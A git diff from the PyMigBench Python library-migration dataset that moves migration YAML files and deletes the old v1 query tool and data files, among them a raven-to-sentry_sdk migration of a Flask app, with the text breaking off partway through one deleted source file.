data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml diff --git a/v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml b/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml similarity index 100% rename from v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml rename to data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml diff --git a/v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml b/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml similarity index 100% rename from v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml rename to data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml diff --git a/v2/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml b/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml similarity index 100% rename from v2/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml rename to data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml diff --git a/v2/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml b/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml similarity index 100% rename from v2/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml rename to data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml diff --git a/v2/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml b/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml similarity index 100% rename from v2/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml rename to data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml diff --git a/v2/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml b/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml similarity index 100% rename from v2/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml rename to data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml diff --git a/v2/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml b/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml similarity index 100% rename from v2/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml rename to data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml diff --git a/v2/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml b/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml similarity index 100% rename from v2/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml rename to data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml diff --git a/v2/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml b/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml similarity index 100% rename from v2/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml rename to data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml diff --git a/v2/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml b/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml similarity index 100% rename from v2/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml rename to data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml diff --git a/v2/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml b/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml similarity index 100% rename from v2/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml rename to data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml diff --git a/v2/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml b/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml similarity index 100% rename from v2/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml rename to data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml diff --git a/v2/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml b/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml similarity index 100% rename from v2/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml rename to data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml diff --git a/v2/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml b/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml similarity index 100% rename from v2/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml rename to data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml diff --git a/v2/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml b/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml similarity index 100% rename from v2/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml rename to data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml diff --git a/v2/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml b/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml similarity index 100% rename from v2/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml rename to data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml diff --git a/v2/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml b/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml rename to data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml diff --git a/v2/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml b/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml rename to data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml diff --git a/v2/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml b/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml rename to data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml diff --git a/v2/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml b/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml similarity index 100% rename from v2/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml rename to data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml diff --git a/v2/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml b/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml similarity index 100% rename from v2/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml rename to data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml diff --git a/v2/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml b/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml similarity index 100% rename from v2/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml rename to data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml diff --git a/v2/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml b/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml similarity index 100% rename from v2/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml rename to data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml diff --git a/v2/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml b/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml rename to data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml diff --git a/v2/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml b/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml rename to data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml diff --git a/v2/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml b/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml rename to data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml diff --git a/v2/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml b/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml rename to data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml diff --git a/v2/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml b/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml similarity index 100% rename from v2/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml rename to data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml diff --git a/v2/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml b/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml similarity index 100% rename from v2/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml rename to data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml diff --git a/v2/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml b/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml similarity index 100% rename from v2/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml rename to data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml diff --git a/v2/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml b/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml similarity index 100% rename from v2/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml rename to data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml diff --git a/v2/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml b/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml similarity index 100% rename from v2/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml rename to data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml diff --git a/v1/code/.gitignore b/v1/code/.gitignore deleted file mode 100644 index ed8ebf5..0000000 --- a/v1/code/.gitignore +++ /dev/null @@ -1 +0,0 @@ -__pycache__ \ No newline at end of file diff --git a/v1/code/.idea/.gitignore b/v1/code/.idea/.gitignore deleted file mode 100644 index 73f69e0..0000000 --- a/v1/code/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# Default ignored files -/shelf/ -/workspace.xml -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml -# Editor-based HTTP Client requests -/httpRequests/ diff --git a/v1/code/.idea/code.iml b/v1/code/.idea/code.iml deleted file mode 100644 index 6690b72..0000000 --- a/v1/code/.idea/code.iml +++ /dev/null @@ -1,13 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git a/v1/code/.idea/inspectionProfiles/Project_Default.xml b/v1/code/.idea/inspectionProfiles/Project_Default.xml deleted file mode 100644 index ee20a26..0000000 --- a/v1/code/.idea/inspectionProfiles/Project_Default.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/inspectionProfiles/profiles_settings.xml b/v1/code/.idea/inspectionProfiles/profiles_settings.xml deleted file mode 100644 index 105ce2d..0000000 --- a/v1/code/.idea/inspectionProfiles/profiles_settings.xml +++ /dev/null @@ -1,6 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/misc.xml b/v1/code/.idea/misc.xml deleted file mode 100644 index 815ccfd..0000000 --- a/v1/code/.idea/misc.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/modules.xml b/v1/code/.idea/modules.xml deleted file mode 100644 index 23968dc..0000000 --- a/v1/code/.idea/modules.xml +++ /dev/null @@ -1,8 +0,0 @@ - - - - - - - - \ No newline at end of file diff --git a/v1/code/.idea/vcs.xml b/v1/code/.idea/vcs.xml deleted file mode 100644 index 6c0b863..0000000 --- a/v1/code/.idea/vcs.xml +++ /dev/null @@ -1,6 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/v1/code/core/Arguments.py b/v1/code/core/Arguments.py deleted file mode 100644 index a3da330..0000000 --- a/v1/code/core/Arguments.py +++ /dev/null @@ -1,49 +0,0 @@ -import argparse - - -class Arguments: - def __init__(self, query: str, - data_type: str = None, - filters: list[str] = None, - output_format: str = None): - self.query = query - self.data_type = data_type - self.filters = parse_filters(filters) - self.output_format = output_format - - def __str__(self): - return str(self.__dict__) - - -def parse_filters(filter_list: list[str]): - if not filter_list: - return {} - dict = {} - for filter in filter_list: - attr, value = filter.split("=") - dict[attr] = value - - return dict - - -def build_arguments() -> Arguments: - parser = argparse.ArgumentParser(description="query PyMigBench") - parser.add_argument("query", nargs='?', default="summary", - choices=["summary", "count", "list", "detail", "s", "c", "l", "d"], - type=str.lower, - help="The query you want to run") - parser.add_argument("-d", "-dt", "--data-type", - help="The type of data that you want to fetch. " - "Summary does not accept any data type." - "Other queries accept exactly one data type.", - choices=["lp", "mg"]) - parser.add_argument("-f", "--filters", required=False, nargs='+', - help="Additional filters. You can pass zero or more filters in =." - "Summary query ignores all filters") - parser.add_argument("-o", "--output-format", required=False, default="yaml", - type=str.lower, - choices=["yaml", "json"], - help="Output format") - - dict = vars(parser.parse_args()) - return Arguments(**dict) diff --git a/v1/code/core/Constants.py b/v1/code/core/Constants.py deleted file mode 100644 index 6ce48c0..0000000 --- a/v1/code/core/Constants.py +++ /dev/null @@ -1,9 +0,0 @@ -LibPairKey = "lp" -MigrationKey = "mg" - -DataTypeKeys = [LibPairKey, MigrationKey] - -DataTypeName = { - LibPairKey: "library pair", - MigrationKey: "migration" -} diff --git a/v1/code/core/Factory.py b/v1/code/core/Factory.py deleted file mode 100644 index e52500b..0000000 --- a/v1/code/core/Factory.py +++ /dev/null @@ -1,34 +0,0 @@ -from core.Arguments import Arguments -from db.Db import Db -from format.JSONFormat import JSONFormat -from format.YAMLFormat import YAMLFormat -from query.Detail import Detail -from query.Listing import Listing -from query.Count import Count -from query.Summary import Summary - - -def build_query(db: Db, arguments: Arguments): - query_name = arguments.query - if not query_name: - return None - query_name = query_name.lower() - query = None - if query_name.startswith("l"): - query = Listing - elif query_name.startswith("c"): - query = Count - elif query_name.startswith("d"): - query = Detail - elif query_name.startswith("s"): - query = Summary - - return query(db, arguments) - - -def build_output_format(output_format: str): - output_format = output_format.lower() - if output_format == "yaml": - return YAMLFormat() - if output_format == "json": - return JSONFormat() diff --git a/v1/code/core/to_dict.py b/v1/code/core/to_dict.py deleted file mode 100644 index 50280e8..0000000 --- a/v1/code/core/to_dict.py +++ /dev/null @@ -1,16 +0,0 @@ -# https://stackoverflow.com/a/7967905/887149 -def to_dict(obj): - if not hasattr(obj, "__dict__"): - return obj - result = {} - for key, val in obj.__dict__.items(): - if key.startswith("_"): - continue - element = [] - if isinstance(val, list): - for item in val: - element.append(to_dict(item)) - else: - element = to_dict(val) - result[key] = element - return result diff --git a/v1/code/db/Db.py b/v1/code/db/Db.py deleted file mode 100644 index 3f6d11c..0000000 --- a/v1/code/db/Db.py +++ /dev/null @@ -1,61 +0,0 @@ -import fnmatch -from pathlib import Path - -import yaml - -from core.Constants import MigrationKey, LibPairKey - -DataItem = dict[str, any] - - -class Db: - migrations: dict[str, DataItem] - lib_pairs: dict[str, DataItem] - _mapping: dict[str, dict[str, DataItem]] - - def __init__(self, data_root: str): - self.data_root = data_root - - def load(self): - self.migrations = self.load_items("migration") - self.lib_pairs = self.load_items("libpair") - self._mapping = { - MigrationKey: self.migrations, - LibPairKey: self.lib_pairs, - } - - def get_list(self, data_type: str): - return self._mapping[data_type].values() - - def filter_list(self, data_type: str, filters: dict[str, str]): - list = self.get_list(data_type) - for k, v in filters.items(): - list = [item for item in list if self.item_satisfies_filter(item, k, v)] - return list - - def get_item(self, data_type: str, id: str): - return self._mapping[data_type][id] - - def load_items(self, data_folder): - paths = Path(self.data_root, data_folder).glob("*.yaml") - items = (self.load_item(p) for p in paths) - dict = {item["id"]: item for item in items} - return dict - - @staticmethod - def item_satisfies_filter(item: DataItem, filter_key: str, filter_value: str): - prop = item[filter_key] - if isinstance(prop, list): - if not filter_value and not prop: - return True # If the user passes empty string and the list property is empty, consider it matching - return any(fnmatch.fnmatch(prop_item, filter_value) for prop_item in prop) - else: - return fnmatch.fnmatch(prop, filter_value) - pass - - @staticmethod - def load_item(yaml_path: Path): - with open(yaml_path) as f: - content = f.read() - dict: DataItem = yaml.safe_load(content) - return dict diff --git a/v1/code/db/__init__.py b/v1/code/db/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/db/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/format/JSONFormat.py b/v1/code/format/JSONFormat.py deleted file mode 100644 index 440ff2f..0000000 --- a/v1/code/format/JSONFormat.py +++ /dev/null @@ -1,9 +0,0 @@ -import json - -from format.OutputFormat import OutputFormat -from query.Result import Result - - -class JSONFormat(OutputFormat): - def format_impl(self, result: Result): - return json.dumps(result.items, indent=2, sort_keys=False, default=vars) diff --git a/v1/code/format/OutputFormat.py b/v1/code/format/OutputFormat.py deleted file mode 100644 index b296472..0000000 --- a/v1/code/format/OutputFormat.py +++ /dev/null @@ -1,18 +0,0 @@ -from abc import ABC, abstractmethod - -from query.Result import Result, ResultDisplayOption - - -class OutputFormat(ABC): - def format(self, result: Result): - count = f"{result.count} items" - if result.display_option == ResultDisplayOption.COUNT_ONLY: - return count - if result.display_option == ResultDisplayOption.DATA_ONLY: - return self.format_impl(result) - if result.display_option == ResultDisplayOption.COUNT_AND_DATA: - return f"{count}\n{self.format_impl(result)}\n{count}\n" - - @abstractmethod - def format_impl(self, result: Result): - pass diff --git a/v1/code/format/YAMLFormat.py b/v1/code/format/YAMLFormat.py deleted file mode 100644 index e12e550..0000000 --- a/v1/code/format/YAMLFormat.py +++ /dev/null @@ -1,9 +0,0 @@ -import yaml - -from format.OutputFormat import OutputFormat -from query.Result import Result - - -class YAMLFormat(OutputFormat): - def format_impl(self, result: Result): - return yaml.safe_dump(result.items, sort_keys=False) diff --git a/v1/code/format/__init__.py b/v1/code/format/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/format/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/pymigbench.py b/v1/code/pymigbench.py deleted file mode 100644 index 4a19ecf..0000000 --- a/v1/code/pymigbench.py +++ /dev/null @@ -1,23 +0,0 @@ -import os.path - -from core.Arguments import build_arguments, Arguments -from core.Factory import build_query, build_output_format -from db.Db import Db -from query.Query import Query - - -def run_query(args: Arguments): - db = Db(os.path.abspath("../data")) - db.load() - query: Query = build_query(db, args) - if query: - result = query.run() - format = build_output_format(args.output_format) - output = format.format(result) - print(output) - else: - print("error building the query") - - -if __name__ == '__main__': - run_query(build_arguments()) diff --git a/v1/code/query/Count.py b/v1/code/query/Count.py deleted file mode 100644 index f51b69d..0000000 --- a/v1/code/query/Count.py +++ /dev/null @@ -1,12 +0,0 @@ -from query.Query import Query -from query.Result import Result, ResultDisplayOption - - -class Count(Query): - def run(self): - if self.arguments.data_type is None: - raise ValueError("Please provide a datatype for count.") - - result = self.apply_filter() - - return Result(result, ResultDisplayOption.COUNT_ONLY) diff --git a/v1/code/query/Detail.py b/v1/code/query/Detail.py deleted file mode 100644 index 6e3c709..0000000 --- a/v1/code/query/Detail.py +++ /dev/null @@ -1,7 +0,0 @@ -from db.Db import DataItem -from query.Query import ListQuery - - -class Detail(ListQuery): - def format_item(self, item: DataItem): - return item diff --git a/v1/code/query/Listing.py b/v1/code/query/Listing.py deleted file mode 100644 index eb64562..0000000 --- a/v1/code/query/Listing.py +++ /dev/null @@ -1,7 +0,0 @@ -from db.Db import DataItem -from query.Query import ListQuery - - -class Listing(ListQuery): - def format_item(self, item: DataItem): - return item["id"] diff --git a/v1/code/query/Query.py b/v1/code/query/Query.py deleted file mode 100644 index 2ab5665..0000000 --- a/v1/code/query/Query.py +++ /dev/null @@ -1,30 +0,0 @@ -from abc import ABC, abstractmethod - -from core.Arguments import Arguments -from db.Db import Db, DataItem -from query.Result import Result, ResultDisplayOption - - -class Query(ABC): - def __init__(self, db: Db, arguments: Arguments): - self.db = db - self.arguments = arguments - - @abstractmethod - def run(self) -> Result: - pass - - def apply_filter(self): - items = self.db.filter_list(self.arguments.data_type, self.arguments.filters) - return items - - -class ListQuery(Query): - def run(self) -> Result: - items = self.apply_filter() - formatted_items = [self.format_item(item) for item in items] - return Result(formatted_items, ResultDisplayOption.COUNT_AND_DATA) - - @abstractmethod - def format_item(self, item: DataItem) -> object: - pass diff --git a/v1/code/query/Result.py b/v1/code/query/Result.py deleted file mode 100644 index 0d53ab1..0000000 --- a/v1/code/query/Result.py +++ /dev/null @@ -1,16 +0,0 @@ -from enum import Enum - -from db.Db import DataItem - - -class ResultDisplayOption(Enum): - COUNT_ONLY = "count_only" - DATA_ONLY = "data_only" - COUNT_AND_DATA = "count_and_data" - - -class Result: - def __init__(self, items: list[DataItem], display_option: ResultDisplayOption): - self.count = len(items) - self.items = items - self.display_option = display_option diff --git a/v1/code/query/Summary.py b/v1/code/query/Summary.py deleted file mode 100644 index 78ad42f..0000000 --- a/v1/code/query/Summary.py +++ /dev/null @@ -1,54 +0,0 @@ -from core.Constants import MigrationKey, LibPairKey -from db.Db import DataItem -from query.Query import Query -from query.Result import Result, ResultDisplayOption - - -class Summary(Query): - def run(self): - migs: list[DataItem] = self.db.get_list(MigrationKey) - all_lib_pairs: list[DataItem] = self.db.get_list(LibPairKey) - sources = {lp["source"] for lp in all_lib_pairs} - targets = {lp["target"] for lp in all_lib_pairs} - libs = sources.union(targets) - domains = {lp["domain"] for lp in all_lib_pairs} - repos = {mg["repo"] for mg in migs} - commits = {mg["commit"] for mg in migs} - lib_pairs_having_migs = {mg["pair_id"] for mg in migs} - - migs_having_code_changes = set() - lib_pairs_having_code_changes = set() - repos_having_code_changes = set() - commits_having_code_changes = set() - - file_count = 0 - segments_count = 0 - for mg in migs: - cc_in_mig = len(mg["code_changes"]) - if cc_in_mig: - migs_having_code_changes.add(mg["id"]) - lib_pairs_having_code_changes.add(mg["pair_id"]) - repos_having_code_changes.add(mg["repo"]) - commits_having_code_changes.add(mg["commit"]) - file_count += cc_in_mig - segments_count += sum(len(cc["lines"]) for cc in mg["code_changes"]) - - result = { - "analogous library pairs": len(all_lib_pairs), - "unique libraries": len(libs), - "unique source libraries": len(sources), - "unique target libraries": len(targets), - "unique library domains": len(domains), - "migrations": len(migs), - "client repositories having migrations": len(repos), - "library pairs having migrations": len(lib_pairs_having_migs), - "migration commits": len(commits), - "migrations having code changes": len(migs_having_code_changes), - "library pairs having code changes": len(lib_pairs_having_code_changes), - "client repositories having code changes": len(repos_having_code_changes), - "commits having code changes": len(commits_having_code_changes), - "modified files": file_count, - "modified code segments": segments_count - } - - return Result([result], ResultDisplayOption.DATA_ONLY) diff --git a/v1/code/requirements.txt b/v1/code/requirements.txt deleted file mode 100644 index 5ca893e..0000000 --- a/v1/code/requirements.txt +++ /dev/null @@ -1 +0,0 @@ -PyYAML~=6.0 \ No newline at end of file diff --git a/v1/code/tests/__init__.py b/v1/code/tests/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/tests/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/tests/misc_test.py b/v1/code/tests/misc_test.py deleted file mode 100644 index 355a710..0000000 --- a/v1/code/tests/misc_test.py +++ /dev/null @@ -1,33 +0,0 @@ -from core.Arguments import Arguments -from pymigbench import run_query - - -def test_detail_1(): - args = Arguments(query="detail", data_type="mg", filters=["target=aiohttp"], output_format="yaml") - run_query(args) - - -def test_detail_2(): - args = Arguments(query="detail", data_type="lp", filters=["target=aiohttp"], output_format="yaml") - run_query(args) - - -def test_detail_multiple_filters(): - args = Arguments(query="detail", data_type="mg", filters=["source=pyyaml", "target=ruamel.yaml"], - output_format="yaml") - run_query(args) - - -def test_count_1(): - args = Arguments(query="count", data_type="mg", filters=["target=aiohttp"], output_format="json") - run_query(args) - - -def test_summary(): - args = Arguments(query="summary", output_format="yaml") - run_query(args) - - -def test__no_data_types__should_throw_error(): - args = Arguments(query="detail") - run_query(args) diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff deleted file mode 100644 index 474fee5..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff +++ /dev/null @@ -1,58 +0,0 @@ -diff --git a/sipa/initialization.py b/sipa/initialization.py - index 48b67d395b58bf0a4fa21b28a6557cf4750efcb2..ea23791cfdc36d614189418a01a57c78859fa5e8 100644 - --- a/sipa/initialization.py - +++ b/sipa/initialization.py -@@ -5,12 +5,11 @@ import os - import os.path - from datetime import datetime - -+import sentry_sdk - from flask_babel import Babel, get_locale --from raven import setup_logging --from raven.contrib.flask import Sentry --from raven.handlers.logging import SentryHandler - from werkzeug.contrib.fixers import ProxyFix - from flask_qrcode import QRcode -+from sentry_sdk.integrations.flask import FlaskIntegration - - from sipa.babel import possible_locales, save_user_locale_setting, select_locale - from sipa.base import IntegerConverter, login_manager -@@ -180,24 +179,22 @@ def init_logging(app): - - If given and existent, apply the additional config file - """ - -- # Configure Sentry client (raven) -- if app.config['SENTRY_DSN']: -- logger.debug("Sentry DSN: %s", app.config['SENTRY_DSN']) -- sentry = Sentry() -- sentry.init_app(app, dsn=app.config['SENTRY_DSN']) -+ # TODO simplify this, by a lot. - -- def register_sentry_handler(): -- handler = SentryHandler() -- -- handler.client = app.extensions['sentry'].client -- setup_logging(handler) -- -- return handler -- else: -+ if not (dsn := app.config['SENTRY_DSN']): - logger.debug("No sentry DSN specified") -- -- def register_sentry_handler(): -- return logging.NullHandler() -+ # Configure Sentry SDK -+ else: -+ logger.debug("Sentry DSN: %s", dsn) -+ sentry_sdk.init( -+ dsn=dsn, -+ integrations=[FlaskIntegration()], -+ traces_sample_rate = 1.0, -+ # release="myapp@1.0.0", -+ ) -+ -+ def register_sentry_handler(): -+ return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py deleted file mode 100644 index 2c8355f..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py +++ /dev/null @@ -1,215 +0,0 @@ -# -*- coding: utf-8 -*- -import logging -import logging.config -import os -import os.path -from datetime import datetime - -from flask_babel import Babel, get_locale -from raven import setup_logging -from raven.contrib.flask import Sentry -from raven.handlers.logging import SentryHandler -from werkzeug.contrib.fixers import ProxyFix -from flask_qrcode import QRcode - -from sipa.babel import possible_locales, save_user_locale_setting, select_locale -from sipa.base import IntegerConverter, login_manager -from sipa.blueprints.usersuite import get_attribute_endpoint -from sipa.defaults import DEFAULT_CONFIG -from sipa.flatpages import CategorizedFlatPages -from sipa.forms import render_links -from sipa.model import build_backends_ext -from sipa.model.misc import should_display_traffic_data -from sipa.session import SeparateLocaleCookieSessionInterface -from sipa.utils import replace_empty_handler_callables, url_self -from sipa.utils.babel_utils import get_weekday -from sipa.utils.git_utils import init_repo, update_repo -from sipa.utils.graph_utils import generate_traffic_chart, provide_render_function - -logger = logging.getLogger(__name__) -logger.addHandler(logging.StreamHandler()) # for before logging is configured - - -def init_app(app, **kwargs): - """Initialize the Flask app located in the module sipa. - This initializes the Flask app by: - - * calling the internal init_app() procedures of each module - * registering the Blueprints - * registering the Jinja global variables - """ - load_config_file(app, config=kwargs.pop('config', None)) - app.wsgi_app = ProxyFix(app.wsgi_app, app.config['NUM_PROXIES']) - init_logging(app) - init_env_and_config(app) - logger.debug('Initializing app') - login_manager.init_app(app) - babel = Babel() - babel.init_app(app) - babel.localeselector(select_locale) - app.before_request(save_user_locale_setting) - app.session_interface = SeparateLocaleCookieSessionInterface() - cf_pages = CategorizedFlatPages() - cf_pages.init_app(app) - backends = build_backends_ext() - backends.init_app(app) - QRcode(app) - - app.url_map.converters['int'] = IntegerConverter - - from sipa.blueprints import bp_features, bp_usersuite, \ - bp_pages, bp_documents, bp_news, bp_generic, bp_hooks, bp_register - - logger.debug('Registering blueprints') - app.register_blueprint(bp_generic) - app.register_blueprint(bp_features) - app.register_blueprint(bp_usersuite) - app.register_blueprint(bp_pages) - app.register_blueprint(bp_documents) - app.register_blueprint(bp_news) - app.register_blueprint(bp_hooks) - app.register_blueprint(bp_register) - - logger.debug('Registering Jinja globals') - form_label_width = 3 - form_input_width = 7 - app.jinja_env.globals.update( - cf_pages=cf_pages, - get_locale=get_locale, - get_weekday=get_weekday, - possible_locales=possible_locales, - get_attribute_endpoint=get_attribute_endpoint, - should_display_traffic_data=should_display_traffic_data, - traffic_chart=provide_render_function(generate_traffic_chart), - current_datasource=backends.current_datasource, - form_label_width_class="col-sm-{}".format(form_label_width), - 